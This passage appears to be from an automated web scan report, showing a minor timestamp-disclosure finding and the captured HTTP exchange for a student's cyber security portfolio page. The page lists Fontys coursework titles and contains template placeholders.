          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal39" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal40" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="vendor/jquery/jquery.min.js"></script>
          <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
          
          <script src="vendor/jquery-easing/jquery.easing.min.js"></script>
          
          <script src="js/jqBootstrapValidation.js"></script>
          <script src="js/contact_me.js"></script>
          
          <script src="js/agency.min.js"></script>
          
          <script src="https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js"></script>
          </body>
          </html>
          
          Evidence
          67108864
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        11. GET https://beekmans.dev
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          908189033, which evaluates to: 1998-10-12 12:43:53

          Request
          Request line and header section (192 bytes)
          GET https://beekmans.dev HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1047 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:55:11 GMT
          Content-Type: text/html; charset=UTF-8
          Connection: keep-alive
          vary: Accept-Encoding
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          CF-Cache-Status: DYNAMIC
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4lOrbKK8y%2Bn8QLhKEGpB7rePrCHT1J%2BQaOZJP06h5%2BW2GkK9CRq%2Fdn7ChLzJzoJLiDaKfMYCpMPOGx7ddQ5eVNaVcohEeYRecx%2BV4c%2BapqYy04o6ANFaN3V3sF2rfmk%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a31e5f8a4c13-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (178340 bytes)
          <!DOCTYPE html>
          <html lang="en">
          <head>
          <meta charset="utf-8">
          <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
          <meta name="description" content="">
          <meta name="author" content="">
          <title>Cyber portfolio</title>
          
          <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
          
          <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
          <link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
          <link href='https://fonts.googleapis.com/css?family=Kaushan+Script' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Droid+Serif:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Roboto+Slab:400,100,300,700' rel='stylesheet' type='text/css'>
          
          <link href="css/agency.min.css" rel="stylesheet">
          </head>
          <body id="page-top">
          
          <nav class="navbar navbar-expand-lg navbar-dark fixed-top" id="mainNav">
          <div class="container">
          <a class="navbar-brand js-scroll-trigger" href="#page-top">Cyber security</a>
          <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">
          Menu
          <i class="fas fa-bars"></i>
          </button>
          <div class="collapse navbar-collapse" id="navbarResponsive">
          <ul class="navbar-nav text-uppercase ml-auto">
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#services">Services</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#portfolio">Portfolio</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#about">About</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#team">Team</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#contact">Contact</a>
          </li>
          </ul>
          </div>
          </div>
          </nav>
          
          <header class="masthead">
          <div class="container">
          <div class="intro-text">
          <div class="intro-lead-in">Welcome To My Portfolio!</div>
          <div class="intro-heading text-uppercase">It's Nice To Meet You</div>
          <a class="btn btn-primary btn-xl text-uppercase js-scroll-trigger" href="#services">Tell Me More</a>
          </div>
          </div>
          </header>
          
          <section id="services">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Introduction</h2>
          <h3 class="section-subheading text-muted">My project.</h3>
          </div>
          </div>
          <div class="row text-center">
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-shopping-cart fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Environment</h4>
          <p class="text-muted">I'm using my own Hyper visor (Microsoft's Hyper-V) on a private server in my home. I can connect via a VPN that's also running on this server to my home network to remotely manage the server and manage and deploy VM's. The server is an old DELL T310 with a Xeon x3440, 24GB ddr3 registered ecc 1333mhz memory and all VM's are installed on a Crucial MX500 ssd. The server is part of the home network just like every other computer in my home.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-laptop fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Context</h4>
          <p class="text-muted">The network I'm building has as focus a webhosting company with some onsite employee's maybe a place for guests and some webservers hosting different websites.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-lock fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Security</h4>
          <p class="text-muted">The network is secured by separating the webservers from the employees and guests on their own VLAN. The network is protected by a pfsense router running custom firewalls for every interface and running Surricata to identify and block possible threats.</p>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="portfolio">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Portfolio</h2>
          <h3 class="section-subheading text-muted">Cyber security.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Blue teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal1">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/01-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Self assessment week 1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal2">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid portfolio-image" src="img/portfolio/blue/02-thumbnail.gif" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V1</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal3">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/03-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Network diagram V2</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal4">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/04-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Secure connections</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal5">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/05-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IDS/IPS</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal6">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/06-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">Information Security and Risk Analysis</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal7">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/07-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S3</h4>
          <p class="text-muted">IT Monitoring</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Red teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal8">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/08-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">SQL injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal9">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/09-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Command injection</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal10">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/10-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site scripting</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal11">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/11-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Cross-site request forgery</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal12">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/12-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Path traversal</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal13">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/13-thumbnail.jpeg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Password cracking</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal14">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/14-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network scanning and enumeration</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal15">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/15-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Network sniffing and spoofing</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal16">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/16-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Law, Ethics and Responsible Disclosure</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal17">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
           </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/17-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Basic hacking process</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal18">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/red/18-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S4</h4>
          <p class="text-muted">Self reflection</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Internship</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal19">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/internship/19-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S5</h4>
          <p class="text-muted">My internship</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Minor</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Red teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal20">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/20-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pentesting methods</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal21">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Linux write-up</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal22">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
           <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">HTB Windows write-up</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal23">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/23-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal24">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis session</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal25">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/25-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Personal pen-test toolbox</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal26">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/26-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security of IOT protocols and technology</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal27">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/27-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Pen-test at COMPANY_NAME_HERE</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal28">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a smartphone app</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal29">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a website</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal30">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/24&28&29&30-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability analysis on a device</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal31">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/red/21&22&31-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Organize a weekly Hack The Box event</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Blue teaming specialisation</h5>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal32">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/32-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Red VS Blue Event</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal33">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">IDS technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal34">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/34-thumbnail.svg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Monitoring technologies</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal35">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/35-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">SIEM technologies</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal36">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/36-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Threat use cases</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal37">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/33&37-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Developing and tuning an IDS</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal38">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
           <img class="img-fluid" src="img/portfolio/minor/blue/38-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Setting up a SOC</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal39">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/39-thumbnail.jpg" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Vulnerability scanning</p>
          </div>
          </div>
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal40">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/minor/blue/40-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
          <h4>Fontys S7</h4>
          <p class="text-muted">Security monitoring, analysis and triage</p>
          </div>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h5 class="section-subheading text-muted">Forensics specialisation</h5>
          </div>
          </div>
          </div>
          </section>
          
          <section id="about">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">About</h2>
          <h3 class="section-subheading text-muted">My cyber security career.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12">
          <ul class="timeline">
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/1.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S3 2019</h4>
          <h4 class="subheading">The beginning</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was the first time I got experienced the cyber security stream and what it had to offer. I learned the basics of the defensive side of cyber security.</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/2.jpg" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S4 2020</h4>
          <h4 class="subheading">Round 2</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">This was my second semester on cyber security this time focusing on the offensive side.</p>
          </div>
          </div>
          </li>
          <li>
          <div class="timeline-image">
          <img class="rounded-circle img-fluid" src="img/about/3.png" alt="">
          </div>
          <div class="timeline-panel">
          <div class="timeline-heading">
          <h4>Fontys S5 2021</h4>
          <h4 class="subheading">The internship</h4>
          </div>
          <div class="timeline-body">
          <p class="text-muted">Lorem ipsum dolor sit amet, consectetur adipisicing elit. Sunt ut voluptatum eius sapiente, totam reiciendis temporibus qui quibusdam, recusandae sit vero unde, sed, incidunt et ea quo dolore laudantium consectetur!</p>
          </div>
          </div>
          </li>
          <li class="timeline-inverted">
          <div class="timeline-image">
